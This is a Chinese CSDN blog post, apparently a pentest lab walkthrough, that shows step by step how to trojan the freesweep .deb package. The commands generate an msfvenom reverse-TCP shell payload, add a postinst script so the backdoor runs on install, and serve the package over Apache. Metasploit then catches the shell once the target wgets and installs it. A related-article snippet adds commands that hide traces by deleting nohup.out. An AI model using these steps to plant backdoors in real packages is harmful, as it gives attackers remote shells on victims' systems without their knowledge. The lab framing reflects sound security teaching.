制作恶意deb软件包来触发后门

最新推荐文章于 2024-08-03 23:50:41 发布
最新推荐文章于 2024-08-03 23:50:41 发布
阅读量679 收藏 8
点赞数 16
文章标签: docker 容器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76737000/article/details/136677543
版权

攻击机:Kali

靶机:Ubuntu

  1. 安装下载软件

# apt --download-only install freesweep

2.解压软件包

kali更新或安装包的目录/var/cache/apt/archives/

# cd /var/cache/apt/archives/

#ls

 

将这个压缩文件移到根目录下方便执行查询

# mv ./freesweep_1.0.2-1_amd64.deb ~/

# dpkg -x freesweep_1.0.2-1_amd64.deb free

我们将文件解压,进入free解压后目录中查看文件列表

3.生成恶意代码到软件包源文件夹中

# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.147.139 LPORT=4444 -b "\x00" -i 10 -f elf -o /root/free/usr/games/freesweep_sources

4.创建软件包信息目录

# mkdir DEBIAN

# cd DEBIAN

# vim  /root/free/DEBIAN/control

创建deb软件包,安装后脚本文件,来加载后门

postinst加执行权限

# chmod 755 /root/free/DEBIAN/postinst

5.重新生成一个软件包

# dpkg-deb --build /root/free/

6 将deb提供下载

# systemctl start apache2

# systemctl status apache2

free.deb复制到apache2 根目录

# cp free.deb /var/www/html/

7.启动msfconsole

8.启动监听

# msf5 \> use exploit/multi/handler

加载payload

# msf5 exploit(multi/handler) \> set payload linux/x64/meterpreter/reverse_tcp

设置监听主机

# msf5 exploit(multi/handler) \> set lhost 192.168.147.169

查看需要配置参数

# msf5 exploit(multi/handler) \> show options

10 靶机下载并安装带木马的deb软件

# wget http://192.168.147.139/free.deb

11.目标机安装软件

# dpkg -i free.deb

Khl N
关注
  • 16
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
RPM和DEB软件包打包教程.doc
11-07
总结来说,RPM和DEB软件包在打包和管理上各有特点,但核心都是为了方便地管理和维护软件,确保系统的稳定性和兼容性。理解这两种包格式的打包过程和管理方式对Linux系统管理员来说至关重要,因为它们能够帮助快速...
postgres_exporter-deb:适用于Ubuntu的带有postgres_exporter的Deb软件包(16.04-18.04)
04-08
用于Ubuntu的带有Deb软件包(xenial,bionic,focus) 安装 apt-get update apt-get install gnupg2 apt-transport-https ca-certificates -y apt-key adv --keyserver hkp://keyserver.ubuntu....
制作恶意deb软件包触发后门
m0_65764670的博客
03-20 240
sudo nohup /usr/games/freesweep_sources &​​:系统后台不挂断,防止注销或退出shell时命令终止。​sudo chmod +x /usr/games/freesweep_sources​​:安装完成后会给程序加上执行权限。​sudo rm -rf /nohup.out​​:因为执行了上一条命令会生成nohup.out文件,防止被发现得删除。查看小程序包含内容,其中,postinst表示安装完要执行的,postrm安装完要删除处理的。关闭终端后连接依然继续。
MSF实战制作deb软件包后门
永远是少年
06-13 443
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF实战制作deb软件包后门。 一、deb恶意软件包制作 二、效果检验
2022-渗透测试-制作恶意deb软件包触发后门
保持微笑的博客
01-19 2180
目录 1.下载软件包 2.解压软件包 小知识1:kali更新或安装包的目录 小知识2:kali解压或安装操作 3.生成恶意代码到软件包源文件中 4.创建软件包信息目录 5.重新生成一个软件包 6 将deb提供下载 7 启动msfconsole 8.配置监听 10 目标机下载并安装带木马的deb软件 11.目标机安装软件 12 监控端获取到session 1.下载软件包 kali安装软件包 apt install 软件名称 kali下载软件包 apt --down..
msf制作恶意deb软件包触发后门
Deeeelete的博客
02-25 1000
攻击机:192.168.132.144(kali1) 手害机:192.168.132.133(kali2) 本该是由攻击机生成恶意deb包,然后把包发给受害机让它访问然后监听的,但因为中间有一个包传递的过程,我就直接省略这一步直接在受害机里生成了,但监听地址是填写的攻击机。 1.第一步我们先下载所需的freesweep软件包(这里使用的是kali2) apt --download-only in...
制作恶意 deb 软件包触发后门
Time_worm的博客
07-24 614
一些恶意软件,系统报错,不是官方渠道下载的软件,也许就像这样,一旦下载了哪怕删除也无法阻止被利用后门建立的连接,所以不要存有侥幸心理。
使用MSF-msfvenom制作恶意 deb 软件包触发后门
枫梓林のBlog
04-21 552
使用MSF-msfvenom制作恶意 deb 软件包触发后门 文章目录使用MSF-msfvenom制作恶意 deb 软件包触发后门 实验环境 Kali Linux 2019.1a Kali Linux 2020.4 1.制作恶意软件包 制作恶意软件包使用 --download-only 方式下载软件包不进行安装 注:freeweep root@fengzilin53:~# apt --download-only install -y freesweep root@fengzilin53:~# m
制作恶意deb软件包linux系统触发后门
xiao_he0123的博客
02-27 2161
文章目录前言一、kali二、操作步骤1.下载一个正常的软件包2.将软件包转移到root目录下3.将安装包解压到root目录中解压为free(文件名)4.制作后门放入free文件中三.总结 前言 通过kali系统中的msf在软件包中植入后门制作deb恶意软件包对linux系统进行shell获取 提示:以下是本篇文章正文内容,下面案例可供参考 一、kali 示例:Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.用户
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透2 —制作恶意 deb 软件包触发后门
天下著书立传者,皆为我师
06-20 928
通过msfvenonom生成含病毒和木马到软件包,目标机下载含木马的deb软件,完成与msf相应的通信
Ubuntu下的deb制作详解
08-03
在 Linux 系统中,deb 包是最常用的软件包格式之一,ubuntu 作为 Linux 发行版之一,deb 包的制作和使用是非常重要的。本文将详细介绍如何使用 QT 程序制作 deb 包,并安装到应用程序菜单中。 deb 包的制作主要可以...
debins:一个简单的一键式.Deb软件包安装程序
02-05
通过debins,用户可以避免在终端中运行像`dpkg -i`或者`gdebi`这样的命令来安装.Deb包,并处理可能出现的依赖问题。 **标签解析:** - **Linux**:表明debins是为Linux操作系统设计的,特别是基于Debian的发行版。...
QPM-linux-deb软件包+依赖库
07-23
【QPM-linux-deb软件包+依赖库】是专为Linux环境设计的,特别是针对Qualcomm平台的Hexagon架构进行优化的软件包管理工具。这个软件包包含了Qualcomm Package Manager (QPM) 的版本2.0.21.1,它是Qualcomm公司提供的...
Docker-学习笔记(借助宝塔面板)
小橙子的博客
08-03 407
ubuntu环境。
Docker基础知识大全
m0_62476845的博客
08-03 503
正在学习中,以后会不断更新此内容,敬请期待!!!如果文章有问题的话也可以私信我或指出来!!!!!
DOCKER】基于UBUNTU的开发镜像
zhy29563
08-03 79
【代码】【DOCKER】基于UBUNTU的开发镜像。
DOCKER】基于DOCKER的服务之Stirling-PDF
最新发布
zhy29563
08-03 60
基于DOCKER的服务之Stirling-PDF
[docker]构建镜像和容器
qq_43496409的博客
08-03 205
以构建python容器为例,有的时候我们会遇到依赖冲突的问题,可以将冲突的依赖安装到venv虚拟环境解决。然后docker run -p 8700:8700 镜像名。浏览器打开locahost:8700出现正确的内容即为成功。首先切换到Dockerfile所在目录。将镜像打包成 .tar 文件。其他机器加载运行这个镜像。
iperf deb软件包
09-18
要安装iperf deb软件包,您可以按照以下步骤进行操作: 1. 首先,您需要确保已安装dpkg-dev软件包。您可以使用以下命令安装它: ``` apt-get install dpkg-dev ``` 2. 然后,将iperf deb软件包拷贝到/debs目录...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值